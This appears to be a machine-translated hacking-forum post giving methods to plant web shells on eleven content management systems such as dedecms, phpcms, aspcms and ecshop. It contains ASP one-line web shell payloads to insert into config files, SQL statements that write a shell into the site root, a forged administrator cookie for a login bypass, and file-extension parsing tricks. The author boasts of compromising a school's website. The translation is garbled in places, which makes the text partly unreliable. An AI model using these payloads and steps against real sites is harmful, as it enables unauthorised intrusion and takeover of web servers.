Eleven common cms shell Methods

Eleven common cms shell Methods
Directory:
0x1 excellent south
0x2 phpweb
0x3 scientific news
0x4 dedecms
0x5
0x6 aspcms
0x7 74cms
0x8 phpcms
0x9 shopex
0x10 old Y Article Management System
0x11 ecshop


I. China South
For Liang Jing, I personally prefer to insert a sentence to the configuration file.
Insert "%> <% Eval (Request (chr (112) %> <% 'in configuration'


Kitchen Knife connection:/inc/config. asp password p
Quotation marks are required. Otherwise, the quotation marks will be inserted.
The second method is dual file upload. Some time ago, I met a wonderful site./inc has no write permission, but can upload files.
Use the double file upload exp found in the Forum two days ago.

<Html> 





I changed the website here. It seems that there are also exp registered at the front end, but I didn't collect it.

This exp is used to transmit the cer in the frame following the image file in the previous frame.

Cer will be parsed into asp, which everyone knows





Ii. phpweb

This vulnerability is mainly caused by the Upload Vulnerability + iis resolution vulnerability.

Exp was sent yesterday. paste the link here.

Click here to view phpweb shell exp



3. kexun

What I personally prefer is to execute SQL statements and use shell.

Run the following SQL statement in the background:



(1) create table cmd (a varchar (50 ))

(2) insert into cmd (a) values ('one-sentence marat ')

(3) select * into [a] in 'site root directory 1.asa20.x.xls ''excel 4.0;' from cmd

(4) drop table cmd

I will explain that the four SQL statements roughly mean

(1) create a cmd table

(2) write a sentence to the cmd table

(3) export the content in the cmd table

(4) Delete the cmd table

You can find the absolute path of the website root directory in the database backup.

It seems that database backup can be captured by the burp and the backup name can be changed. Everyone knows this. I have never tried it.



Iv. dedecms

I didn't want to write this. Everyone knows this. In addition, the variable overwrite vulnerability of some time ago seems a little bad, but it works well for lower versions, this seems to be the simplest.

Directly upload a php trojan in the background file management





V. Dust margin

What I saw at the front-end portal was not recognized at first. My alma mater used this system.

The name of the background page is changed.

This is rarely used, but after all, I know how to share it.

This has a front-end registered user, the background can directly log on to the Administrator portal to log on to your registered user, but now basically all registration is disabled

I remember that my alma mater was closed, and I used the exp in cms penetration in the fik portal. I failed to say that

I took my alma mater and forgot my password at the front desk to retrieve the password. Our school administrator was stupid. The problem and answer were that admin was successfully transferred to the backend.

This background uses shell to save files remotely.

You can also insert a sentence "%> <% Eval (Request (chr (112) %> <%'


 


Connect inc/config. asp



Ps: before publishing this article, I downloaded the source code and wrote a sentence in the background for a long time. I also succeeded in killing my alma mater.



Vi. aspcms

This aspcms shell is also quite simple. Here I will briefly introduce it.

Cookie spoofing is supported at Background logon.

Cookies: username = admin; ASPSESSIONIDAABTAACS = ihdjojacpkfeeenhhmjhklg; LanguageAlias = cn; LanguagePath = % 2F; languageID = 1; adminId = 1; adminName = admin; groupMenu = 1% 2C + 70% 2C + 10% 2C + 11% 2C + 12% 2C + 13% 2C + 14% 2C + 20% 2C + 68% 2C + 15% 2C + 16% 2C + 17% 2C + 18% 2C + 3% 2C + 25% 2C + 57% 2C + 58% 2C + 59% 2C + 2% 2C + 21% 2C + 22% 2C + 23% 2C + 24% 2C + 4% 2C + 27% 2C + 28% 2C + 2C + 29% 2C + 5% 2C + 49% 2C + 52% 2C + 56% 2C + 30% 2C + 51% 2C + 53% 2C + 54% 2C + 55% 2C + 188% 2C + 67% 2C + 63% 2C + 190% 2C + 2C + 184% 2C + 86% 2C + 6% 2C + 32% 2C + 33% 2C + 34% 2C + 8% 2C + 37% 2C + 183% 2C + 38% 2C + 60% 2C + 9; groupName = % B3 % AC % BC % B6 % B9 % DC % C0 % ED % D4 % B1 % D7 % E9

Change login. asp in background login to index. asp and directly go to the background.

Where can I upload a Trojan using shell directly in the template? you can name it and resolve the vulnerability. You know.

You can also insert a sentence in a non-iis6.0 environment.



VII. 74cms



I don't understand this. You can understand it yourself.



Click here to view shell in 74cms background





8. phpcms

This also seems to have the SQL Execution function, too long to wait for such a station, and I forgot to say something about it.

Directly edit the template and modify the homepage template to insert a sentence.

Generate html select no then there is a box below select generate file extension point php save and directly connect to the home page file



IX. shopex



And aspcms, directly generate a template to insert into the statement, and generate a. html

We can name it AV. asp; av.

Generated by av.asp;av.html

Various kitchen knife connections



10. Old Y Article Management System

When a hacker hijacks a blog in the past, there are several sites in section C, one of which is old Y.

You can directly modify the editor by calling the editor.

If it cannot be called, the database backup should be captured by burp and the. mdb should be changed to. asp.



11. ecshop

This can be used to execute an SQL statement to take shell or back up a database. As described above, will database backup be used by everyone?

I don't blame you for not using it, but I will understand it when I come home and watch more AV.

Slave --------------------------------------------------------------------------------------------------------------------------------

Write articles while reading AV

Writing and writing stopped for nearly two hours

All of the above are personal experiences. I will review what I know before.

If you don't know, study.

I have collected a lot of information for writing this article. I am too lazy, so I am too lazy to turn around some forms of connection.

To become a core member of fik